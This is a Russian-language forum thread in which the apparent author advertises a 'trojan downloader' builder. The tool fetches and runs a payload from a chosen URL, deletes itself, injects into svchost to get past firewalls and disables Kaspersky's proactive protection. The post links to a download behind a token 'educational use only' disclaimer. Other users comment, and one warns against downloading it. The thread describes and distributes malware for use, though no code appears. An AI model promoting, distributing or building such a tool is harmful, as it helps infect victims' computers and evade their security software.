Builder trojan downloader v1.2 Даунлоадер - загружает на зараженный компьютер файл (например ваш трой) с url-a указанного в билдере. Принцип работы: После запуска сливает файл с url-a и сохраняет на зараженый компьютер в директорию заданную билдером (например в папку винды), и запускает ваш файл. После запуска вашего файла удаляет свое тело. Там есть обход фаеров путем инжекта в доверенный процесс svchost, и вырубка проактивки касперского, путем восстановления оригинальной sdt. Это публичная версия, толком не тестировал, используйте на свой страх и риск. Пишите свои пожелания и предложения Качать тут Обсуждение на secnull ПРИВЕДЕННАЯ ПРОГРАММА МОЖЕТ БЫТЬ ИСПОЛЬЗОВАНА ТОЛЬКО В УЧЕБНО-ПОЗНАВАТЕЛЬНЫХ ЦЕЛЯХ! Так что если вы собираетесь нарушать закон, то автор программы не несет за это никакой ответственности!
Вообще темы вредоносного ПО администрацией на поощряються. Одно дело, когда его пишут "наши", как пример программирования, вместе с исходниками, другое дело, когда выкладываеться вредоносный софт фиг знает кем и с каким содержанием. НЕ КАЧАЙТЕ ЭТУ ЧУШЬ.
Насклько я понимаю логику событий, то даунлоадер должен вывести в накаут антивирусы а фаерволлы, чтобы действительно вредоносная программа могла спокойна загрузиться на комп и не быть замеченой для антивирусов и прочей лажи. Про это в топике ни слова не сказано - это раз. [upd] Топикстартер и есть автор. Линк на описание №2 : http://secnull.info/index.php?showtopic=754
ну че чисто ? если так то аффтор давай зачетку только ты говоришь про инжект в процесс.. он как рандомно сам выбирает куда внедряцца или что просто на скрине не видно и как обходица проактивка .. автоклик небось ?
попробовал запустить со включеным фаерволом собственнного написания(ВыдерниШнурИзСетевой v 1.0) на VMWare вроде компилит, но пока отчетов не приходило
проактивка 7 касперчега говорит об доступе к памяти NOD32 IMON файл http://*****.ru/123.exe вероятно модифицированный Win32/Statik троян а сам нод его не палит тока его интернет монитор